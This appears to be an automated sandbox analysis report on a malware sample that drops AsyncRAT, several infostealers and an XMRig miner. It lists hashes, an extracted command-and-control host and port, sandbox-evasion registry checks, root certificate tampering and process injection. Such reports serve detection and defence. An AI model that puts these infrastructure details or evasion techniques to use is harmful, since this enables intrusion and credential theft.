asyncrat | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
300s
max time network
302s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09-04-2024 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

asyncrat lumma raccoon redline risepro xmrig zgrat discovery evasion infostealer miner persistence pyinstaller rat spyware stealer upx

Malware Config

Extracted

Family

asyncrat

Version

0.5.6B

koradon.giize.com:6606

Mutex

vomsklihddikoeyxag

Attributes

delay
5
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Lumma Stealer payload V2 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe	family_lumma_V2

Detect Lumma Stealer payload V4 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe	family_lumma_v4

Detect ZGRat V1 19 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe	family_zgrat_v1
behavioral4/memory/3852-205-0x0000000000230000-0x0000000000734000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-236-0x0000000005760000-0x0000000005C10000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-238-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-237-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-240-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-242-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-244-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-246-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-248-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-250-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-252-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-254-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-256-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-268-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-258-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-274-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/4568-278-0x0000000005760000-0x0000000005C0B000-memory.dmp	family_zgrat_v1
behavioral4/memory/3164-411-0x0000000006730000-0x000000000697A000-memory.dmp	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon

Raccoon Stealer V2 payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe	family_raccoon_v2

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\mk.exe	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

funta.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ funta.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	funta.exe

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral4/memory/4016-447-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

funta.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	funta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	funta.exe

Executes dropped EXE 37 IoCs

Processes:

2.3.1.1.exeTweeter%20Traffic.exefunta.exemomsstiflersdgjboigfnbio.exevmtoolsd.exevmtoolsd.exema.exe.exeghjkl.exeinstaller.exeinstaller.tmpnetcorecheck_x64.exenetcorecheck_x64.exenetcorecheck_x64.exenetcorecheck_x64.exeAma2.exeEszop.exepatch.execrypted.exe123p.exemk.exebd2.exedckuybanmlgp.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exeEszop.exe.exeigfxCUIService%20Module.exeigfxCUIService%20Module.execonan.execrypted_69a30000.exegookcom.exeasdfg.exe

pid	process
3788	2.3.1.1.exe
1080	Tweeter%20Traffic.exe
2400	funta.exe
2540	momsstiflersdgjboigfnbio.exe
4152	vmtoolsd.exe
2984	vmtoolsd.exe
3852	ma.exe
4520	.exe
4568	ghjkl.exe
2324	installer.exe
1820	installer.tmp
4824	netcorecheck_x64.exe
5052	netcorecheck_x64.exe
3572	netcorecheck_x64.exe
4992	netcorecheck_x64.exe
3164	Ama2.exe
2948	Eszop.exe
3192	patch.exe
1548	crypted.exe
2412	123p.exe
2224	mk.exe
4216	bd2.exe
2184	dckuybanmlgp.exe
952	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
1912	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
1080	igfxCUIService%20Module.exe
2364	igfxCUIService%20Module.exe
2024	Eszop.exe
1620	.exe
888	igfxCUIService%20Module.exe
760	igfxCUIService%20Module.exe
3060	conan.exe
4912	crypted_69a30000.exe
3132	gookcom.exe
1804	asdfg.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

funta.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine funta.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Wine	funta.exe

Loads dropped DLL 64 IoCs

Processes:

vmtoolsd.exevmtoolsd.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exeigfxCUIService%20Module.exe

pid	process
4152	vmtoolsd.exe
4152	vmtoolsd.exe
4152	vmtoolsd.exe
4152	vmtoolsd.exe
4152	vmtoolsd.exe
4152	vmtoolsd.exe
4152	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
2760	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
3792	igfxCUIService%20Module.exe
2364	igfxCUIService%20Module.exe
2364	igfxCUIService%20Module.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral4/memory/4016-447-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

Processes:

flow	ioc
10	raw.githubusercontent.com
66	raw.githubusercontent.com
86	raw.githubusercontent.com
110	raw.githubusercontent.com
19	raw.githubusercontent.com
36	raw.githubusercontent.com
99	raw.githubusercontent.com
97	raw.githubusercontent.com
98	raw.githubusercontent.com
4	bitbucket.org
68	raw.githubusercontent.com
71	raw.githubusercontent.com
84	raw.githubusercontent.com
85	raw.githubusercontent.com
88	raw.githubusercontent.com
113	raw.githubusercontent.com
1	raw.githubusercontent.com
39	bitbucket.org
67	raw.githubusercontent.com
101	raw.githubusercontent.com
108	raw.githubusercontent.com
111	raw.githubusercontent.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

funta.execrypted.exe

pid process

2400 funta.exe
1548 crypted.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

vmtoolsd.execmd.exe.exedckuybanmlgp.exepowershell.execrypted_69a30000.exe

description	pid	process	target process
PID 2984 set thread context of 1920	2984	vmtoolsd.exe	cmd.exe
PID 1920 set thread context of 2736	1920	cmd.exe	MSBuild.exe
PID 4520 set thread context of 4016	4520	.exe	vbc.exe
PID 2184 set thread context of 1844	2184	dckuybanmlgp.exe	conhost.exe
PID 2184 set thread context of 1588	2184	dckuybanmlgp.exe	svchost.exe
PID 1892 set thread context of 3196	1892	powershell.exe	RegAsm.exe
PID 4912 set thread context of 4860	4912	crypted_69a30000.exe	RegAsm.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2644 sc.exe
2316 sc.exe
3816 sc.exe
1516 sc.exe

pid	process
2644	sc.exe
2316	sc.exe
3816	sc.exe
1516	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\igfxCUIService%20Module.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4748 1080 WerFault.exe Tweeter%20Traffic.exe
3124 3196 WerFault.exe RegAsm.exe
4928 4912 WerFault.exe crypted_69a30000.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1888 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1728 timeout.exe

pid	pid_target	process	target process
4748	1080	WerFault.exe	Tweeter%20Traffic.exe
3124	3196	WerFault.exe	RegAsm.exe
4928	4912	WerFault.exe	crypted_69a30000.exe

pid	process
1888	schtasks.exe

pid	process
1728	timeout.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

momsstiflersdgjboigfnbio.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	momsstiflersdgjboigfnbio.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	momsstiflersdgjboigfnbio.exe
Key created	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325	momsstiflersdgjboigfnbio.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000\Software\Microsoft\SystemCertificates\CA\Certificates\78E50262E8C47571FB82D5063A6C9BD91BB8A325\Blob = 03000000010000001400000078e50262e8c47571fb82d5063a6c9bd91bb8a325140000000100000014000000ef4c0092a6fb762e5e95e2c95f871b19d54de2d904000000010000001000000003f6e71fa4328959fc11dbda6e2594a00f0000000100000030000000effb32d2d626fdd3cedd8f30be7db5bedc8f636cb1eb2b41256bf77805094c42d35fa47f4ec6029a846c8ccb1c691438190000000100000010000000dfd7f624560e51db4e9ed98d584f0a405c0000000100000004000000000c0000180000000100000010000000ea6089055218053dd01e37e1d806eedf4b0000000100000044000000300037004300450046003200460036003500340045003300450044003600300035003000460046004300390042003600450042003800340034003200350030005f00000020000000010000004e0600003082064a30820432a003020102021100835b7615206d2d6e097e0b6e409fefc0300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3232313131363030303030305a170d3332313131353233353935395a3044310b300906035504061302555331123010060355040a1309496e7465726e6574323121301f06035504031318496e436f6d6d6f6e20525341205365727665722043412032308201a2300d06092a864886f70d01010105000382018f003082018a028201810089f05cc438bad03457af9755a0f42243fc3e18113adb6d7a52210631d6d4b7b7928886858ff899ff1885a29d2b5ae1f8042149de44af405f9a22112c3a7b9747a995892a54c79dc733902923314855b7781aa63ab60c1a3f3bbf5d123fe039b3fa1a0b5bf8bfcc3d7d897bd2f79a9f354f2a3fbff7fd449fdbf54d494366b8c2a5691830928bae7b4bac89d60aed5f16df37bead316f591d89b5628d4c89dc372583dc6855cbfec6d3d3f04c0bbb874aaa4724e41132dffb3ec55ad73c735d9ff927ef98a1ca155a8aa4d3ed80c92bc2ac1a3a038e0f8434d008a1553f94cc9e8c9a134f1a0fbf5dfd016af9972821834efe6ecd078e743df9a3f670d7a5780b8278b688f558b63b864561af3286f945898929fc1efddd5138f87649de241350ad47dc21f4c7577802b4ac179f57979abc611feb56bbd455c2c0de8111b4b36f0e31d55e3b096366f62b5234689aeb4d3b91b3ca7bde5712550a7dc26e7eda7382fee6fc0f360b34e0374e006ccd61d1b9b7aaf2c983e8b122c7d81f2a0cdcf10203010001a38201703082016c301f0603551d230418301680145379bf5aaa2b4acf5480e1d89bc09df2b20366cb301d0603551d0e04160414ef4c0092a6fb762e5e95e2c95f871b19d54de2d9300e0603551d0f0101ff04040302018630120603551d130101ff040830060101ff020100301d0603551d250416301406082b0601050507030106082b0601050507030230220603551d20041b3019300d060b2b06010401b231010202673008060667810c01020230500603551d1f044930473045a043a041863f687474703a2f2f63726c2e7573657274727573742e636f6d2f55534552547275737452534143657274696669636174696f6e417574686f726974792e63726c307106082b0601050507010104653063303a06082b06010505073002862e687474703a2f2f6372742e7573657274727573742e636f6d2f55534552547275737452534141414143412e637274302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d01010c0500038202010026800d34e41eae22beaf3ea6e284f9c6b725b1f7db2fa875c26a82acc3b6ce5b82c6a906cc11632a639972de975d50d94eb0af24a57652230510d9f0087c34eb3ce40e8c28940b694f6a1f34721bac365104f3470c76b1e637d0c92cdd97487bdae3b39ac46258883a1f43c32f305132715f39987ff0351a4a78249a74c48842551d60092397e495bad7ce64c22776e366ec2e6d2f09004003fad0831bcba48b59842f544bfaf7de582d5ff7181730788c639df97b36b04014946caef20acba2162192058dea1ab2a0574ea66ae5f32bbb092195ee099541ff6f8b05410c82a6fb6ccb0e8fe7851924f3103405bd41a8fcf26cf112495878cb9ad9e5bcc1e0ba3660dd3ad4757df870e79c80c17df34889c00276fe091b219fa5b4bac6c8b7502375e72a5a1b8dcf26a4345270500ee47ad22a3502979236462191a1d0f5393fd02e00f84337316fca16e539dde1cb5655fdb2cd621b60097d592d699da5fd26d8ee9cbc25460c90bfe3a990518cd903eacaec9a927abad50c98096dee6d7e7135fcebf54405ce43a7d55fb83ea135b34a0d283b631c8455a06a044b4de5da698f8c52882aece8bc4b1e7368deb1bc54945f35541d8056cc6fb74e201a24925cdf994ebd952d24832cf6999309996d86fe184475d74958787715c2e2d8c69e622395445acb1ed26f5c475fd9a11a6742ce6f65e8df33ba049be35e576fdb0a0d	momsstiflersdgjboigfnbio.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	momsstiflersdgjboigfnbio.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

funta.exemomsstiflersdgjboigfnbio.exevmtoolsd.exevmtoolsd.execmd.exe.exe123p.exepowershell.exepowershell.exedckuybanmlgp.exemk.exegookcom.exe

pid	process
2400	funta.exe
2400	funta.exe
2540	momsstiflersdgjboigfnbio.exe
2540	momsstiflersdgjboigfnbio.exe
4152	vmtoolsd.exe
2984	vmtoolsd.exe
2984	vmtoolsd.exe
1920	cmd.exe
1920	cmd.exe
4520	.exe
2412	123p.exe
2412	123p.exe
4504	powershell.exe
2412	123p.exe
2412	123p.exe
2412	123p.exe
2412	123p.exe
2412	123p.exe
4504	powershell.exe
4504	powershell.exe
2412	123p.exe
2412	123p.exe
2412	123p.exe
1892	powershell.exe
1892	powershell.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
2184	dckuybanmlgp.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
2224	mk.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe
3132	gookcom.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

vmtoolsd.execmd.exe

pid process

2984 vmtoolsd.exe
1920 cmd.exe
1920 cmd.exe

pid	process
2984	vmtoolsd.exe
1920	cmd.exe
1920	cmd.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

Processes:

FUCKER.exeMSBuild.exema.exe.exeghjkl.exeAma2.exeEszop.exevbc.execrypted.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exemk.exegookcom.exeasdfg.exe.exe

description	pid	process
Token: SeDebugPrivilege	4668	FUCKER.exe
Token: SeDebugPrivilege	2736	MSBuild.exe
Token: SeDebugPrivilege	3852	ma.exe
Token: SeDebugPrivilege	4520	.exe
Token: SeDebugPrivilege	4568	ghjkl.exe
Token: SeDebugPrivilege	3164	Ama2.exe
Token: SeDebugPrivilege	2948	Eszop.exe
Token: SeLockMemoryPrivilege	4016	vbc.exe
Token: SeLockMemoryPrivilege	4016	vbc.exe
Token: SeLoadDriverPrivilege	1548	crypted.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeShutdownPrivilege	3336	powercfg.exe
Token: SeCreatePagefilePrivilege	3336	powercfg.exe
Token: SeShutdownPrivilege	2352	powercfg.exe
Token: SeCreatePagefilePrivilege	2352	powercfg.exe
Token: SeShutdownPrivilege	4296	powercfg.exe
Token: SeCreatePagefilePrivilege	4296	powercfg.exe
Token: SeShutdownPrivilege	4984	powercfg.exe
Token: SeCreatePagefilePrivilege	4984	powercfg.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeShutdownPrivilege	2316	powercfg.exe
Token: SeCreatePagefilePrivilege	2316	powercfg.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeCreatePagefilePrivilege	1748	powercfg.exe
Token: SeShutdownPrivilege	3844	powercfg.exe
Token: SeCreatePagefilePrivilege	3844	powercfg.exe
Token: SeShutdownPrivilege	1624	powercfg.exe
Token: SeCreatePagefilePrivilege	1624	powercfg.exe
Token: SeLockMemoryPrivilege	1588	svchost.exe
Token: SeDebugPrivilege	2224	mk.exe
Token: SeDebugPrivilege	3132	gookcom.exe
Token: SeDebugPrivilege	1804	asdfg.exe
Token: SeDebugPrivilege	1620	.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

